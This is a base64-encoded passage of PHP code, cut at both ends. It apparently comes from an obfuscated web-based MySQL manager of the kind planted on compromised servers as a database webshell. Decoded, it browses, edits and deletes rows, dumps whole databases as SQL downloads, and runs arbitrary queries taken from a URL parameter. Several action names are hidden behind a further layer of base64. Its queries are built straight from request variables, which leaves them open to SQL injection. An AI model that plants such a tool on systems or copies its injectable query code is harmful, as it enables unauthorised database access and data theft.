iICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gL